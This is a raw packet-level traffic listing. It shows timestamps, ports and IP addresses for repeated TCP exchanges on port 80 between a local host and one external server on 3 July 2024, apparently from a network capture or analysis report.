Jul 3, 2024 18:08:38.174160004 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174170971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174184084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174189091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174207926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174210072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174221992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174222946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174233913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174248934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174268961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174407959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174421072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174453974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174549103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174560070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174571037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174582958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174586058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174611092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174614906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174627066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174633980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174638033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174649000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174659014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174662113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.174680948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.174706936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175005913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175017118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175029039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175040960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175052881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175055027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175065041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175070047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175076008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175088882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175097942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175116062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175131083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175277948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175288916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175299883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175311089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175312042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175327063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175329924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175340891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175342083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175354004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175364971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175369024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175381899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175395966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175404072 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175590992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175601006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175618887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175628901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175630093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175642014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175662994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175662994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175668001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175679922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175690889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175693989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175703049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175707102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175714970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.175724983 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.175753117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176095009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176106930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176117897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176129103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176139116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176141977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176150084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176158905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176162004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176175117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176179886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176199913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176206112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176213026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176223993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176227093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176235914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176248074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176249027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176259995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.176278114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.176289082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.261476040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261490107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261502028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261514902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261527061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261538982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261576891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.261605978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.261635065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261646032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261657953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261676073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261687994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261691093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.261699915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261710882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261712074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.261722088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261734962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261754990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.261773109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.261815071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261827946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.261859894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262160063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262224913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262236118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262248039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262262106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262288094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262336016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262346983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262357950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262370110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262373924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262394905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262422085 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262577057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262588978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262599945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262615919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262625933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262628078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262639046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262650967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262653112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262662888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262664080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262676001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262695074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262715101 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262887001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262898922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262909889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262919903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262934923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262938023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262949944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262949944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.262962103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262974977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262986898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.262989044 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263000965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263006926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263014078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263025045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263025999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263036966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263047934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263056040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263060093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263071060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263072968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263082981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263089895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263094902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263109922 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263134956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263498068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263510942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263520956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263528109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263536930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263539076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263550043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263561010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263566017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263571978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263582945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263592005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263593912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263606071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263612032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263616085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263628006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263637066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263641119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263652086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263657093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263674021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263691902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.263850927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.263883114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.389833927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.395215988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568196058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568211079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568221092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568239927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568319082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568330050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568340063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568351030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568432093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568432093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568432093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568432093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568444967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568456888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568494081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568517923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568530083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568541050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568552017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568566084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568587065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568708897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568721056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568758965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568942070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568953037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568964005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568974972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568986893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.568988085 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.568998098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569010019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569015026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569021940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569034100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569044113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569045067 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569056034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569063902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569067001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569077969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569081068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569087982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569108963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569137096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569489956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569502115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569513083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569525003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569535017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569545031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569577932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569639921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569650888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569662094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569674015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569679022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569684029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569694996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569705963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569708109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569716930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569729090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569736958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569741011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569751024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569751978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569763899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.569767952 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.569801092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570204973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570215940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570228100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570246935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570256948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570259094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570270061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570275068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570282936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570293903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570297956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570306063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570316076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570324898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570327997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570338964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570342064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570352077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570358038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570363998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570374966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570384026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570386887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570399046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570410013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570413113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570432901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570450068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.570972919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570985079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.570996046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571006060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571013927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571017981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571028948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571028948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571041107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571050882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571058035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571062088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571072102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571077108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571083069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571086884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571093082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571105003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571115971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571125031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571127892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571137905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571149111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571150064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571161032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571163893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571172953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571193933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571219921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571737051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571748018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571758032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571768999 CEST	80	49710	85.28.47.4	192.168.2.6
